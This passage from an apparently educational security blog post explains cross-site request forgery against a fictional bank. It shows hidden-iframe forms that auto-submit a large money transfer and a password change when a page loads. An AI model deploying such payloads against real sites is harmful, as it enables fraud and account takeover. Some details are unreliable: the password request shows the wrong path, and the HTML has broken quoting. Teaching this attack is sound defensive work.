Never click on untrusted or unfamiliar links. Make sure that any sensitive web sites you access – your email, banking accounts, etc. – are done in their own browser and kept separate from any other Web surfing.

For a description of how WhiteHat Security detects CSRF, check out Arian Evan’s blog at https://blog.whitehatsec.com/tag/csrf/.

So even though my example of CRSF was relatively harmless, the attack could have just as easily been directed towards a banking website to transfer money. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.

For transferring money, bigbank.com may have a form that looks something like this on its website:

<form name=”legitForm” action=”/transfer.php” method=”POST”>
<b>From account:<input name="transferFrom" value="" type="text">
<br>To account:<input name="transferTo" value="" type="text">

<br>Amount: <input name=”amount” value=”” type=”text
<span><input name=”transfer” value=”Transfer” type=”submit”></span>

</form>

When you fill out and submit the legitForm, the browser sends a POST request to the server that looks something like this:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

transferFrom=111222&transferTo=111333&amount=1.00&transfer=Transfer

Neither of the previous codes is relevant to the user, but they DO give the attacker the structure to build his own evil POST request containing his account information. The attacker embeds the following code onto his website that you clicked on:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”stealMoney” action=http://bigbank.com/transfer.php method=”POST” target=”hidden”>
<input type=”hidden” name=”transferFrom” value=””> ß——-Problem?
<input type=”hidden” name=”transferTo” value=”555666”>
<input type=”hidden” name=”amount” value=”1000000.00”>
<input type=”hidden” name=”transfer” value=”Transfer”>
</form>
<script>document.stealMoney.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. Not only does it not require any user action other than loading the website; there is also no indication to the user that a request was ever sent.

Now here’s another example, but using a “change password request,” instead. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.  Most likely, bigbank.com’s website will have a “Change User’s Password” form that looks something like this:

<form name=”changePass” action=”/changePassword.php” method=”POST”>
<b>New Password: <input name="newPass" value="" type="text">
<br>Confirm Pasword:<input name="confirmPass" value="" type="text">

<span><input name=”passChange” value=”Change” type=”submit”></span>

</form>

When you fill out and submit the valid changePass form, the browser sends a POST request that will look similar to this to the server:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

newPass=iloveyou&confirmPass=iloveyou&passChange=”Change”

Again, while neither of the previous codes is relevant to the user, they DO give the attacker the structure to build his own evil POST request containing the information he wants to submit. The attacker embeds the following code onto his website that you clicked on; then, when the page loads, the code executes:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”makePassword” action=http://bigbank.com/changePassword.php method=”POST” target=”hidden”>
<input type=”hidden” name=”newPass” value=”Stolen!”>
<input type=”hidden” name=”confirmPass” value=”Stolen!”>
<input type=”hidden” name=”passChange” value=”Change”>
</form>
<script>document.makePassword.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. And, as in the example above, not only is no user action required other than loading the website, there is no indication to the user that a request was ever sent.